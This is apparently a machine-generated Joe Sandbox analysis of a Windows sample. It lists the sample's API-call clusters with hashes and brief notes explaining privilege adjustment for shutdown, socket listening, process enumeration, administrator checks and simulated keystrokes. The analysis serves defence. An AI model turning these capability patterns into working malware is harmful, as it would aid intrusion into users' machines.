                                                                                          • Part of subcall function 00F1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1B180
                                                                                          • Part of subcall function 00F1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F1B1AD
                                                                                          • Part of subcall function 00F1B134: GetLastError.KERNEL32 ref: 00F1B1BA
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00F27A0F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        • Opcode ID: f82385a65a32fa3d98056ef2938b7e4ac7f7425a90a8350f1f90860828052002
                                                                                        • Instruction ID: 6d94242d616cff49e15d3c147c96ddea749a75c9356be7ca368c77f476d87177
                                                                                        • Opcode Fuzzy Hash: f82385a65a32fa3d98056ef2938b7e4ac7f7425a90a8350f1f90860828052002
                                                                                        • Instruction Fuzzy Hash: EF01F772B593766BF7287668AC5BBBF32589B00770F140424F913E20E2D5AC9E00B5A4
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F38CA8
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38CB7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00F38CD3
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00F38CE2
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38CFC
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00F38D10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: 7d8b857bc672ec37848d1b5ba1b58b75d06fba51d2bd58d3df76275840415ea4
                                                                                        • Instruction ID: 18e7f1b1447ab5b6bfe179a72b95bf2cefddfa8483b30596f437dd1426a841cf
                                                                                        • Opcode Fuzzy Hash: 7d8b857bc672ec37848d1b5ba1b58b75d06fba51d2bd58d3df76275840415ea4
                                                                                        • Instruction Fuzzy Hash: 9321D331A002059FCB10EF68DD45B6EB7E9EF48760F108158FA56A73D2CB74AD42AB61
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F26554
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F26564
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F26583
                                                                                        • __wsplitpath.LIBCMT ref: 00F265A7
                                                                                        • _wcscat.LIBCMT ref: 00F265BA
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F265F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1605983538-0
                                                                                        • Opcode ID: e09bb33c83ac044ab06aed7746fac4764c96318bff5d62c211641aff3f244cb0
                                                                                        • Instruction ID: eba680155bd663a543277578765c4304a04242244af077e2b011c54eefc0d127
                                                                                        • Opcode Fuzzy Hash: e09bb33c83ac044ab06aed7746fac4764c96318bff5d62c211641aff3f244cb0
                                                                                        • Instruction Fuzzy Hash: 1221A771E00218ABDB10ABA4DC89FEEB7BCEB09310F5400A5F505D3141DBB59F85EB60
                                                                                        APIs
                                                                                          • Part of subcall function 00F3A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00F3A84E
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00F39296
                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00F392B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 4170576061-0
                                                                                        • Opcode ID: cfc2380cd6a98cccf95770ad77dc2a7460f2dd3ad8b8f18ecdb5921ddb9166b7
                                                                                        • Instruction ID: b0f704cb47338874e62a4389267ce70fa4e2f7e40b8ec91ed25423ba7e44056c
                                                                                        • Opcode Fuzzy Hash: cfc2380cd6a98cccf95770ad77dc2a7460f2dd3ad8b8f18ecdb5921ddb9166b7
                                                                                        • Instruction Fuzzy Hash: 7641B171A00608AFDB10AB68CC42E7E77EDEF48724F14454CFA56AB2D2DBB49D019B91
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F2EB8A
                                                                                        • _wcscmp.LIBCMT ref: 00F2EBBA
                                                                                        • _wcscmp.LIBCMT ref: 00F2EBCF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F2EBE0
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F2EC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 2387731787-0
                                                                                        • Opcode ID: efaec3a6cd6e87083bf74dc7bad848c85c96ee39d5ca6453570fc02f207ad018
                                                                                        • Instruction ID: 98dc805c7ade232cfa7abf7fd3c6f849641ff8331a27fc39f89b875efd2de861
                                                                                        • Opcode Fuzzy Hash: efaec3a6cd6e87083bf74dc7bad848c85c96ee39d5ca6453570fc02f207ad018
                                                                                        • Instruction Fuzzy Hash: E541D1356003018FC708DF68D890AAAB3E4FF49324F20455DFA5A8B3A1DB71E940DB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 7bad5304fa1b5ec1ddec3ea099f389c10987b6032e5805384b12f79ca84ffb28
                                                                                        • Instruction ID: d5151657064b2ad633cf8b14685d0ab1eddb6629e3b7d8d01f9923c6da0a39f7
                                                                                        • Opcode Fuzzy Hash: 7bad5304fa1b5ec1ddec3ea099f389c10987b6032e5805384b12f79ca84ffb28
                                                                                        • Instruction Fuzzy Hash: 9911B231B005146BE7216F26DC44E6FBB9CEF847A0B05042EF949D7281CF709903A6A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
• Opcode ID: 52c3287f3d7000658fd8ef50d72f546f36dadcbb816a2ff8b8688a32c62fcf12
• Instruction ID: f917731c5192c1a6be5541cf64ba64a87c11da38b3bfd0415efa92c46a54c3a6
• Opcode Fuzzy Hash: 52c3287f3d7000658fd8ef50d72f546f36dadcbb816a2ff8b8688a32c62fcf12
• Instruction Fuzzy Hash: 6A928A71E0025ACBDF24CF59C8807BDB7B1BB54314F2881AAE856FB281D770AD81DB91
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00EFE014,76230AE0,00EFDEF1,00F7DC38,?,?), ref: 00EFE02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EFE03E
• Note: GetNativeSystemInfo (reports the native, non-WOW64 processor architecture) is resolved at run time through LoadLibraryA/GetProcAddress instead of the import table; this run-time resolution is the pattern behind the "dynamically determine API calls" signature.
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: d4f34b72b96bf77e50ad9b103e08f1d604031e1dc07f08fb7ce85aa9a5f133b2
• Instruction ID: 27d94e9fdd45c7d934b2efdb431144f03361e113cad387ce3db823c8d6140f65
• Opcode Fuzzy Hash: d4f34b72b96bf77e50ad9b103e08f1d604031e1dc07f08fb7ce85aa9a5f133b2
• Instruction Fuzzy Hash: E0D0A730901716EFEB315F61EC4862276D4AB01308F188419E491E2260DBF4DC809A50
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F213DC
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 43bf9600a5b9de92227d3ca1e25e05b5998b26c72657ab2d892806253103e0bf
• Instruction ID: 38e5250424802c49b95e44a7939c2113b82a891f3f9843cde6acb203cbb76d6a
• Opcode Fuzzy Hash: 43bf9600a5b9de92227d3ca1e25e05b5998b26c72657ab2d892806253103e0bf
• Instruction Fuzzy Hash: 84324675A007159FC728DF29D480AAAB7F0FF58320B15C46EE59ADB3A1E770E981CB44
APIs
• Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00EFB22F
• Part of subcall function 00EFB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00EFB5A5
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Proc$LongWindow
• String ID:
• API String ID: 2749884682-0
• Opcode ID: 2f966a3d11c4996a574fb36bee9e0dce7ab479f0e713682d335458a961647b47
• Instruction ID: eede990f8db948ba5c1409bd12d3187d68a214aa43ae5aa31c1b2ec01b71857c
• Opcode Fuzzy Hash: 2f966a3d11c4996a574fb36bee9e0dce7ab479f0e713682d335458a961647b47
• Instruction Fuzzy Hash: 80A149A051400CFAF72CAE29DC88EBF395CEB46355F189119FF06FA1A2DB159D04B272
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F343BF,00000000), ref: 00F34FA6
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F34FD2
• Note: InternetQueryDataAvailable followed by InternetReadFile is the WinINet loop for draining an HTTP response body into memory; the actual request setup (InternetOpen/InternetOpenUrl) is in the caller at 00F343BF, not in this function.
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: c488c136240f6fc762d564ff37b0426c4e030d2978ed7f12408409686f108e6d
• Instruction ID: b00999e5f5d869eceacf6cf6185457bfa182b6923d4ae1f865a1b0e2e93aaccc
• Opcode Fuzzy Hash: c488c136240f6fc762d564ff37b0426c4e030d2978ed7f12408409686f108e6d
• Instruction Fuzzy Hash: E341C672A04609BFEB209E94CC85FBF77ACEB80774F14402AF60567181DA75BE41B6A0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F2E20D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F2E267
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F2E2B4
• Note: 00000001 is SEM_FAILCRITICALERRORS. Setting it around GetDiskFreeSpaceExW suppresses the "no disk in drive" system dialog while probing removable drives, so the query fails silently instead of blocking on a message box; the mode is restored afterwards.
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: b71d440b10ee775fb6b313f09c15d69eba0cd2d865886b79f0ab9fdb656d6fc1
• Instruction ID: b86b82ba09f782e95ed7c2bb23610cd740323dbc4f85eeba2f444aea6b021734
• Opcode Fuzzy Hash: b71d440b10ee775fb6b313f09c15d69eba0cd2d865886b79f0ab9fdb656d6fc1
• Instruction Fuzzy Hash: 2A216D35A00118EFCB00EFA5D884AADFBF8FF49314F1484A9E905EB392DB719905DB50
APIs
• Part of subcall function 00EFF4EA: std::exception::exception.LIBCMT ref: 00EFF51E
• Part of subcall function 00EFF4EA: __CxxThrowException@8.LIBCMT ref: 00EFF533
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1B180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F1B1AD
• GetLastError.KERNEL32 ref: 00F1B1BA
• Note: the GetLastError call directly after AdjustTokenPrivileges is the ERROR_NOT_ALL_ASSIGNED check. AdjustTokenPrivileges returns TRUE even when the requested privilege was not enabled (for example when the token does not hold it), so the error code is the only reliable indicator that the privilege adjustment actually took effect.
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: 810caac4bb4c357f1060c1b69e9bfb525b0168f4d04f5d44b095494d9b6ec4d7
• Instruction ID: eb515ba6f00a3054c99622241ff9a0dba66bc7e1791d6bc81b06765a8c961ff3
• Opcode Fuzzy Hash: 810caac4bb4c357f1060c1b69e9bfb525b0168f4d04f5d44b095494d9b6ec4d7
• Instruction Fuzzy Hash: DA11BFB2900209FFE7189F64DC95D6BB7ECEF44310B21852EE456A3240DB70FC418A60
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F266AF
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00F266EC
• CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F266F5
• Note: 002D1400 decodes to IOCTL_STORAGE_QUERY_PROPERTY (device type 0x2D FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS). The handle is opened with FILE_READ_ATTRIBUTES (0x80), FILE_SHARE_READ|FILE_SHARE_WRITE (3) and OPEN_EXISTING (3), which is a device-property query rather than a data read; this is the function behind the "communicate with device drivers" signature.
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: 831acf4a9df6bacc6594d20d5e02ac91a94e74436360d2cdb7ae4ae91a7c4d94
• Instruction ID: 0a3d2300de79a3aaf047c848855df3d308ab47770eaacd981bde1b10b4cbeea2
• Opcode Fuzzy Hash: 831acf4a9df6bacc6594d20d5e02ac91a94e74436360d2cdb7ae4ae91a7c4d94
• Instruction Fuzzy Hash: 5611C8B2E01228BFE7108BACEC45FAF7BBCEB09754F104555F911E7190C2B4AE0497A1
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F27223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F2723A
• FreeSid.ADVAPI32(?), ref: 00F2724A
• Note: two sub-authorities, 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS), build S-1-5-32-544, BUILTIN\Administrators. Passing that SID to CheckTokenMembership with a NULL token (the caller's impersonation token) is the standard "is the caller an administrator" test, the same sequence IsUserAnAdmin performs; it tells the sample whether it already runs elevated.
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 37a317c97f8483648d01479b7db36701639b9ce5da91767d10c1a49bb358dc29
• Instruction ID: 40a789a915ceb14848d4a7e9947b982572a3a3b1808198f379824595a39350f4
• Opcode Fuzzy Hash: 37a317c97f8483648d01479b7db36701639b9ce5da91767d10c1a49bb358dc29
• Instruction Fuzzy Hash: F8F01D76E0430DFFDF04DFE4DD99AEEBBB8EF08201F104469E612E2191E2709A44AB10
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00F2F599
• FindClose.KERNEL32(00000000), ref: 00F2F5C9
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: bbfcf566bcf064b4b0b29b6bf52da764e6e2e17fd6db8e3ba44a1873b324e062
• Instruction ID: c64a773b08be79f154fbdcd3816842ec5dd1c69011dc91211dd3a9d7464d1d58
• Opcode Fuzzy Hash: bbfcf566bcf064b4b0b29b6bf52da764e6e2e17fd6db8e3ba44a1873b324e062
• Instruction Fuzzy Hash: 5F11C4326006049FD710EF29D845A2EF3E8FF85324F04892EF9A5D7291CB74AD048B91
                                                                                        APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F3BE6A,?,?,00000000,?), ref: 00F2CEA7
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F3BE6A,?,?,00000000,?), ref: 00F2CEB9
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F24153
• keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00F24166
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F1ACC0), ref: 00F1AB99
• CloseHandle.KERNEL32(?,?,00F1ACC0), ref: 00F1ABAB
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
